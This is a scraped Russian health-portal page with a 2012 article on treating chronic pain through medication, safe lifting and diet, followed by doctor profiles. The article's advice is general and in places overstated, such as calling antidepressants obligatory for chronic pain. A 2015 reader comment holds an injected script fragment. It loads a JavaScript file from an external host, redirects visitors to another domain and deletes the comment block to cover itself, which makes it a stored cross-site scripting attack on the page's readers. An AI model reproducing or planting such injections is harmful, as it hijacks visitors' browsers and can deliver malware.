Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Хроническая боль  >>  Хроническая боль
 
Обратная связь
 

Хроническая боль

Размер шрифта
28 мая 2012 09:00
  • google_analytics: false
  • Нравится

Терпеть постоянную сильную боль – большая ошибка. Есть три способа решить эту проблему и победить хроническую боль.

Хроническая боль

При хронической боли, какую бы локализацию она не имела (суставы конечностей или позвоночника), всегда есть возможности для ее облегчения или устранения.

Механизм возникновения боли

Первым пусковым механизмом хронической боли является воспаление. Воспаление проявляется:

  • отеком;
  • болью;
  • покраснением;
  • ограничением функций.

Если боль не прекращается в течение 14 дней, она может считаться хронической.

1 шаг: правильно лечить

Каждый врач должен знать три принципа лечения хронической боли.

Три принципа

  1. Нестероидные противовоспалительные препараты (НПВП) снимут воспаление и боль. В группе этих препаратов: аспирин, диклофенак, индометацин, кетопрофен, ортофен, ибупрофен, которые назначает врач. Препараты можно принимать и самостоятельно. В случае самостоятельного лечения длительность их приема должна быть 3-5 дней, а дозировка – минимальной. Если спустя 3-5 дней боль не прошла, обратитесь к врачу.

В норме, чтобы возникло движение, мышцы сокращаются и расслабляются. Но когда человек испытывает боль, мышцы перестают сокращаться, для того, чтобы движение прекратилось, в мышцах возникает спазм. Согласно современным представлениям о хронической боли доктор обязан назначить препараты миорелаксанты.

  1. Миорелаксанты – препараты, расслабляющие мышцы и снимающие мышечный спазм. Эти препараты назначаются только после НПВП и усиливают их обезболивающее действие.

Довольно часто при длительном течении хронической боли в коре больших полушарий возникает очаг застойного болевого возбуждения, который доминирует над локальным болевым. Человек может физически не испытывать боль в месте ее возникновения, но при этом продолжает непрерывно думать о ней. Поэтому при постоянной боли, когда не помогают НПВП и миорелаксанты, врачи назначают антидепрессанты. В современном мире эта группа препаратов является обязательной для лечения хронической боли.

  1. Антидепрессанты – препараты, влияющие на восприятие боли, ее анализ в мозге и осознание человеком.

2 шаг: убрать нагрузку

1

При хронической боли существует несколько принципов «общения» с тяжестями.

  • Нельзя поднимать тяжести, наклоняясь. Подъем тяжестей из такого положения приводит к постоянным микротравмам поясничного отдела позвоночника, в результате возникает грыжа межпозвонкового диска.
  • Обязательно при подъеме тяжелого груза прижимайте его к себе. В этом случае нагрузка распределится по позвоночнику равномерно. Нагрузка от тяжести в неправильном положении увеличивает нагрузку на позвоночник в 10 раз.
  • Если нужно перенести тяжелый груз, лучше распределить его на две сумки. Чтобы их поднять, встаньте между ними по центру и прежде чем поднять, присядьте, держа спину ровно. Затем возьмите в обе руки по сумке и так же, не сгибаясь, выпрямьтесь. Благодаря этому нагрузка на позвоночник распределится равномерно, а спина не заболит.

3 шаг: убрать продукты, вызывающие воспаление

1

Человек должен убрать из еды те продукты, которые провоцируют воспаление. Это так называемые белые продукты:

  • белый сахар;
  • белая мука и все, что из нее сделано;
  • некоторые переработанные продукты, например чипсы.

Все эти продукты активно поддерживают процесс воспаления и хроническую боль. При переваривании пищи из этих продуктов уровень глюкозы повышается.

Глюкоза в крови напрямую воздействует на эндотелий (внутреннюю стенку сосудов), разрушая его, это поддерживает воспаление в тех местах, которые и без того больны.

Такие продукты нужно исключить из рациона, заменив их большим количеством фруктов, овощей и зелени. Кстати, считается, что чеснок и лук снижают уровень воспаления.

Правильный рацион поможет не только снять боль, но и снизить вес тела, и снять в свою очередь нагрузку на позвоночник и суставы.



Cюжеты по теме:
Три способа победить хроническую боль

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:41

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.